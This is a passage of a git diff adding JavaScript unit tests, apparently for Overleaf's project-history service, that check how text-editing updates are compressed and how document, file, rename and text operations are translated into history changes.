'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append ops from different doc pathnames', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'doc-one', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'doc-two', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it("should not merge updates that track changes and updates that don't", function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + }) + + it('should not merge undos with regular ops', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', u: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', u: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge tracked delete rejections', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', trackedDeleteRejection: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + pathname: 'main.tex', + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + op: { p: 6, i: 'bar', trackedDeleteRejection: true }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should preserve history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge 
updates from different users', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo', hpos: 13 }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not merge inserts inside different comments', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16 }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should propagate the commentIds property', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar', hpos: 16, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar', hpos: 13, commentIds: ['comment-id-1'] }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + }) + + describe('delete - delete', function () { + it('should append one delete to the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should insert one delete inside the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 1, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 1, d: 'bafoor' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append separated deletes', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge deletes over tracked changes', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { + p: 3, + d: 'bar', + trackedChanges: [{ type: 'delete', pos: 2, length: 10 }], + }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + 
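+            // The trackedChanges metadata on the second delete records a
+            // tracked change inside the deleted range, which blocks merging.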
]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { + p: 3, + d: 'bar', + trackedChanges: [{ type: 'delete', pos: 2, length: 10 }], + }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should preserve history metadata', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not merge when the deletes are tracked', function () { + // TODO: We should be able to lift that constraint, but it would + // require recalculating the hpos on the second op. + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id, tc: 'tracking-id' }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id, tc: 'tracking-id' }, + v: 42, + }, + { + op: { p: 3, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id, tc: 'tracking-id' }, + v: 43, + }, + ]) + }) + }) + + describe('insert - delete', function () { + it('should undo a previous insert', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, d: 'o' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'fo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should remove part of an insert from the middle', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'fobaro' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should cancel out two opposite updates', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3, d: 'foo' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([]) + }) + + it('should not combine separated updates', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, d: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not combine updates with overlap beyond the end', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, d: 'bardle' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + 
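+          // The delete ('bardle') extends three characters past the end of the
+          // inserted 'foobar', so the two ops cannot cancel and both survive.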
op: { p: 3, i: 'foobar' },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 42,
+          },
+          {
+            op: { p: 6, d: 'bardle' },
+            meta: { ts: this.ts2, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should preserve history metadata', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, i: 'foo', hpos: 13 },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 5, d: 'o', hpos: 15 },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, i: 'fo', hpos: 13 },
+            meta: { ts: this.ts1, user_id: this.user_id },
+            v: 43,
+          },
+        ])
+      })
+    })
+
+    describe('delete - insert', function () {
+      it('should do a diff of the content', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, d: 'one two three four five six seven eight' },
+              meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 },
+              v: 42,
+            },
+            {
+              op: { p: 3, i: 'one 2 three four five six seven eight' },
+              meta: { ts: this.ts2, user_id: this.user_id, doc_length: 100 },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 7, d: 'two' },
+            meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 },
+            v: 43,
+          },
+          {
+            op: { p: 7, i: '2' },
+            meta: { ts: this.ts1, user_id: this.user_id, doc_length: 97 },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should return a no-op if the delete and insert are the same', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, d: 'one two three four five six seven eight' },
+              meta: { ts: this.ts1, user_id: this.user_id },
+              v: 42,
+            },
+            {
+              op: { p: 3, i: 'one two three four five six seven eight' },
+              meta: { ts: this.ts2, user_id: this.user_id },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([])
+      })
+
+      it('should preserve history metadata', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: {
+                p: 3,
+                d: 'one two three four five six seven eight',
+                hpos: 13,
+              },
+              meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 },
+              v: 42,
+            },
+            {
+              op: {
+                p: 3,
+                i: 'one 2 three four five six seven eight',
+                hpos: 13,
+                commentIds: ['comment-1'],
+              },
+              meta: { ts: this.ts2, user_id: this.user_id, doc_length: 100 },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 7, d: 'two', hpos: 17 },
+            meta: { ts: this.ts1, user_id: this.user_id, doc_length: 100 },
+            v: 43,
+          },
+          {
+            op: { p: 7, i: '2', hpos: 17, commentIds: ['comment-1'] },
+            meta: { ts: this.ts1, user_id: this.user_id, doc_length: 97 },
+            v: 43,
+          },
+        ])
+      })
+
+      it('should not merge when tracking changes', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
+            {
+              op: { p: 3, d: 'one two three four five six seven eight' },
+              meta: {
+                ts: this.ts1,
+                user_id: this.user_id,
+                doc_length: 100,
+                tc: 'tracking-id',
+              },
+              v: 42,
+            },
+            {
+              op: { p: 3, i: 'one 2 three four five six seven eight' },
+              meta: {
+                ts: this.ts2,
+                user_id: this.user_id,
+                doc_length: 100,
+                tc: 'tracking-id',
+              },
+              v: 43,
+            },
+          ])
+        ).to.deep.equal([
+          {
+            op: { p: 3, d: 'one two three four five six seven eight' },
+            meta: {
+              ts: this.ts1,
+              user_id: this.user_id,
+              doc_length: 100,
+              tc: 'tracking-id',
+            },
+            v: 42,
+          },
+          {
+            op: { p: 3, i: 'one 2 three four five six seven eight' },
+            meta: {
+              ts: this.ts2,
+              user_id: this.user_id,
+              doc_length: 100,
+              tc: 'tracking-id',
+            },
+            v: 43,
+          },
+        ])
+      })
+    })
+
+    describe('a long chain of ops', function () {
+      it('should always split after 60 seconds', function () {
+        expect(
+          this.UpdateCompressor.compressUpdates([
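+            // Four inserts spaced 20s apart: the ops at ts1, +20s and +40s
+            // fall within the 60-second window and merge into one update; the
+            // op at +80s starts a new one.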
{ + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts1 + 20000, user_id: this.user_id }, + v: 43, + }, + { + op: { p: 9, i: 'baz' }, + meta: { ts: this.ts1 + 40000, user_id: this.user_id }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { ts: this.ts1 + 80000, user_id: this.user_id }, + v: 45, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobarbaz' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { ts: this.ts1 + 80000, user_id: this.user_id }, + v: 45, + }, + ]) + }) + }) + + describe('external updates', function () { + it('should be split from editor updates and from other sources', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-editor-id', + }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-other-editor-id', + }, + v: 43, + }, + { + op: { p: 9, i: 'baz' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 44, + }, + { + op: { p: 12, i: 'qux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 45, + }, + { + op: { p: 15, i: 'quux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'upload', + }, + v: 46, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + source: 'some-editor-id', + }, + v: 43, + }, + { + op: { p: 9, i: 'bazqux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'dropbox', + }, + v: 45, + }, + { + op: { p: 15, i: 'quux' }, + meta: { + ts: this.ts1, + user_id: this.user_id, + type: 'external', + source: 'upload', + }, + v: 46, + }, + ]) + }) + }) + + describe('doc hash', function () { + it("should keep the doc hash if it's on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + expect( + this.UpdateCompressor.compressUpdates([ + { op: { p: 3, i: 'foo' }, meta, v: 42 }, + { + op: { p: 6, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + }) + + it("should not keep the doc hash if it's not on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 42, + }, + { op: { p: 6, i: 'bar' }, meta, v: 43 }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta, + v: 43, + }, + ]) + }) + + it('special case for delete + insert triggering diff', function () { + const meta = { ts: this.ts1, user_id: this.user_id, doc_length: 10 } + expect( + this.UpdateCompressor.compressUpdates([ + { op: { p: 3, d: 'foo' }, meta, v: 42 }, + { + op: { p: 3, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 43, + }, + ]) + ).to.deep.equal([ + { op: { p: 3, d: 'foo' }, meta, v: 43 }, + { + op: { p: 3, i: 'bar' }, + meta: { ...meta, doc_length: 7, doc_hash: 'hash1' }, + v: 43, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js b/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js new file mode 100644 index 
0000000..f285fb4 --- /dev/null +++ b/services/project-history/test/unit/js/UpdateTranslator/UpdateTranslatorTests.js @@ -0,0 +1,1215 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' +import Core from 'overleaf-editor-core' + +const MODULE_PATH = '../../../../app/js/UpdateTranslator.js' + +describe('UpdateTranslator', function () { + beforeEach(async function () { + this.UpdateTranslator = await esmock(MODULE_PATH, { + 'overleaf-editor-core': Core, + }) + this.callback = sinon.stub() + + this.project_id = '59bfd450e3028c4d40a1e9aa' + this.doc_id = '59bfd450e3028c4d40a1e9ab' + this.file_id = '59bfd450e3028c4d40a1easd' + this.user_id = '59bb9051abf6e8682a269b64' + this.version = 0 + this.timestamp = new Date().toJSON() + this.mockBlobHash = '12345abc12345abc12345abc12345abc12345abc' + }) + + describe('convertToChanges', function () { + it('can translate doc additions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate file additions', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test.png', + url: 'filestore.example.com/test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate doc renames', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + new_pathname: '/new_main.tex', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + newPathname: 'new_main.tex', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate file renames', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test.png', + new_pathname: '/new_test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test.png', + newPathname: 'new_test.png', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('can translate multiple updates with the correct versions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: this.user_id, + ts: this.timestamp, + 
}, + }, + blobHashes: { file: this.mockBlobHash }, + }, + { + update: { + file: this.file_id, + pathname: '/test.png', + url: 'filestore.example.com/test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + { + authors: [], + operations: [ + { + pathname: 'test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('returns an error if the update has an unknown format', function () { + const updates = [ + { + update: { + foo: 'bar', + }, + }, + ] + expect(() => + this.UpdateTranslator.convertToChanges(this.project_id, updates) + ).to.throw('update with unknown format') + }) + + it('replaces backslashes with underscores in pathnames', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/\\main\\foo.tex', + new_pathname: '/\\new_main\\foo\\bar.tex', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: '_main_foo.tex', + newPathname: '_new_main_foo_bar.tex', + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces leading asterisks with __ASTERISK__ in pathnames', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/test*test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/test*test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'test__ASTERISK__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces a leading space for top-level files with __SPACE__', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/ test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: '__SPACE__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('replaces leading spaces of files in subfolders with __SPACE__', function () { + const updates = [ + { + update: { + file: this.file_id, + pathname: '/folder/ test.png', + meta: { + user_id: this.user_id, + ts: this.timestamp, + }, + url: 'filestore.example.com/folder/test.png', + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => 
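As the escaping tests above show, pathnames are normalised before they reach the history store: the leading slash is dropped, backslashes become underscores, asterisks become __ASTERISK__, and a leading space in a path component becomes __SPACE__. A sketch of such a sanitiser, written as our own helper rather than the real UpdateTranslator internals:

function sanitizePathname(pathname) {
  return pathname
    .replace(/^\//, '') // history pathnames are relative
    .replace(/\\/g, '_') // backslashes become underscores
    .replace(/\*/g, '__ASTERISK__') // asterisks are escaped
    .split('/')
    .map(part => part.replace(/^ /, '__SPACE__')) // leading space per component
    .join('/')
}

console.log(sanitizePathname('/\\main\\foo.tex')) // _main_foo.tex
console.log(sanitizePathname('/test*test.png')) // test__ASTERISK__test.png
console.log(sanitizePathname('/folder/ test.png')) // folder/__SPACE__test.png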
change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'folder/__SPACE__test.png', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + }, + ]) + }) + + it('sets a null author when user_id is "anonymous-user"', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + user_id: 'anonymous-user', + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [null], + timestamp: this.timestamp, + }, + ]) + }) + + it('sets an empty array as author when there is no meta.user_id', function () { + const updates = [ + { + update: { + doc: this.doc_id, + pathname: '/main.tex', + docLines: 'a\nb', + meta: { + ts: this.timestamp, + }, + }, + blobHashes: { file: this.mockBlobHash }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + file: { + hash: this.mockBlobHash, + }, + }, + ], + v2Authors: [], + timestamp: this.timestamp, + }, + ]) + }) + + describe('text updates', function () { + it('can translate insertions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 3, i: 'foo' }, + { p: 15, i: 'bar', commentIds: ['comment1'] }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + source: 'some-editor-id', + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [ + 3, + 'foo', + 9, + { i: 'bar', commentIds: ['comment1'] }, + 8, + ], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('can translate deletions', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { p: 3, d: 'lo' }, + { p: 10, d: 'bar' }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + this.project_id, + updates + ).map(change => change.toRaw()) + + expect(changes).to.deep.equal([ + { + authors: [], + operations: [ + { + pathname: 'main.tex', + textOperation: [3, -2, 7, -3, 5], + }, + ], + v2Authors: [this.user_id], + timestamp: this.timestamp, + v2DocVersions: { + '59bfd450e3028c4d40a1e9ab': { + pathname: 'main.tex', + v: 0, + }, + }, + }, + ]) + }) + + it('should translate retains without tracking data', function () { + const updates = [ + { + update: { + doc: this.doc_id, + op: [ + { + p: 3, + r: 'lo', + }, + ], + v: this.version, + meta: { + user_id: this.user_id, + ts: new Date(this.timestamp).getTime(), + pathname: '/main.tex', + doc_length: 20, + }, + }, + }, + ] + + const changes = this.UpdateTranslator.convertToChanges( + 
